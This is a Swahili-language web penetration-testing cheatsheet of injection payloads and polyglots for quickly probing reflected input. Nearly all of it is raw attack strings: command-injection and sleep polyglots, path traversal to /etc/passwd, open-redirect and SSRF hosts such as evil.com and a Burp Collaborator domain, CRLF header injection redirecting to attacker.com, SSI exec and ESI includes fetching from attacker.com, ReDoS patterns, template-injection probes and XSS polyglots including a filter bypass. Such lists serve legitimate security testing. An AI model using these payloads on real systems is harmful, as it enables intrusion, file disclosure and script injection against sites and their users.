Lengo la PoCs na Polygloths hizi ni kumtolea mtihani muhtasari wa haraka wa udhaifu anaweza kutumia ikiwa ingizo lake linaonyeshwa kwa namna fulani katika jibu .
Hii cheatsheet haitoi orodha kamili ya majaribio kwa kila udhaifu , ni baadhi tu ya msingi. Ikiwa unatafuta majaribio ya kina zaidi, pata kila udhaifu ulioelezwa.
Huta pata sindano zinazotegemea Aina ya Maudhui kama XXE , kwani kawaida utajaribu hizo mwenyewe ikiwa utapata ombi linalotuma data za xml. Huta pata pia sindano za database hapa kwani hata kama maudhui fulani yanaweza kuonyeshwa inategemea sana teknolojia na muundo wa DB ya nyuma.
Polygloths list
Copy {{ 7 * 7 }} [ 7 * 7 ]
1 ;sleep$ { IFS } 9 ; #${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/* $(sleep 5 )`sleep 5 `` */- sleep ( 5 ) - '/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||" /* ` */
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/ etc / passwd
. . / . . / . . / . . / . . / . . / etc / hosts
. .\ ..\..\..\..\..\etc/hosts
/ etc / hostname
. . / . . / . . / . . / . . / . . / etc / hosts
C : / windows / system32 / drivers / etc / hosts
. . / . . / . . / . . / . . / . . / windows / system32 / drivers / etc / hosts
. .\ ..\..\..\..\..\windows/system32/drivers/etc/hosts
http : // asdasdasdasd . burpcollab . com / mal . php
\ \asdasdasdasd.burpcollab.com/mal.php
www . whitelisted . com
www . whitelisted . com . evil . com
https : // google . com
// google . com
javascript : alert ( 1 )
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((a + ) + ) + $
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javascript : alert ()
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" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
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Jaribio la Msingi
Majaribio ya Msingi
Copy ; ls
|| ls ;
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& ls ;
` ls `
$(ls )
Copy 1 ; sleep$ {IFS} 9 ;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5 ) ` sleep 5 `` * /-sleep( 5 )-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/ * ` * /
Jaribio la Msingi
Copy %0d%0aLocation:%20http://attacker.com
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain )%3C/script%3E
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Dangling Markup
Majaribio ya Msingi
Copy <br><b><h1>THIS IS AND INJECTED TITLE </h1>
Majaribio ya Msingi
Copy /etc/passwd
. ./ . ./ . ./ . ./ . ./ . ./etc/hosts
.. \ .. \ .. \ .. \ .. \ .. \ etc/hosts
. ./ . ./ . ./ . ./ . ./ . ./etc/hosts
. ./ . ./ . ./ . ./ . ./ . ./windows/system32/drivers/etc/hosts
.. \ .. \ .. \ .. \ .. \ .. \ windows/system32/drivers/etc/hosts
Jaribio la Msingi
Copy www.whitelisted.com
javascript:alert(1 )
Jaribio la Msingi
Copy ( \\w* ) +$
([a-zA-Z]+) *$
((a + ) + ) + $
Jaribio la Msingi
Copy <!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Copy <!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Majaribio sawa yanayotumika kwa Open Redirect yanaweza kutumika hapa.
Majaribio ya Msingi
Copy ${{<%[%'"}}%\
<%= 7*7 %>
Copy {{ 7 * 7 }} $ { 7 * 7 } <%= 7 * 7 %> $ {{ 7 * 7 }} #{7*7}${{<%[%'"}}%\
Jaribio la Msingi
Copy <xsl:value-of select="system-property('xsl:version')" />
<esi:include src="" stylesheet=""></esi:include>
Copy <xsl:value-of select="system-property('xsl:version')" /><esi:include src="" stylesheet=""></esi:include>
Jaribio la Msingi
Copy " onclick=alert() a="
'"><img src=x onerror=alert(1) />
Copy javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
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